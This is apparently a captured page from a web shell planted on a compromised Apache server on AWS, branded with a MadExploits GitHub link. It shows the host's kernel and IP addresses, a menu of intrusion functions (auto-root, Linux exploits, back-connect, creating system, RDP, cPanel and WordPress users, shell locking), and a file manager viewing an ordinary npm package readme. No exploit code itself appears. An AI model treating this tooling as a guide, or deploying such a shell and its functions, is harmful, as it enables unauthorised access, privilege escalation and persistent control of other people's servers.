Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.149.238.207
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-p-is-promise /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
552
B
-rw-r--r--
copyright
1.44
KB
-rw-r--r--
readme.md
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# p-is-promise [](https://travis-ci.org/sindresorhus/p-is-promise) > Check if something is a promise Why not [`is-promise`](https://github.com/then/is-promise)? That module [checks for a thenable](https://github.com/then/is-promise/issues/6), not an ES2015 promise. This one is stricter. You most likely don't need this. Just pass your value to `Promise.resolve()` and let it handle it. Can be useful if you need to create a fast path for a synchronous operation. ## Install ``` $ npm install p-is-promise ``` ## Usage ```js const pIsPromise = require('p-is-promise'); const Bluebird = require('bluebird'); pIsPromise(Promise.resolve('🦄')); //=> true pIsPromise(Bluebird.resolve('🦄')); //=> true pIsPromise('🦄'); //=> false ``` ## Related - [More…](https://github.com/sindresorhus/promise-fun)
Close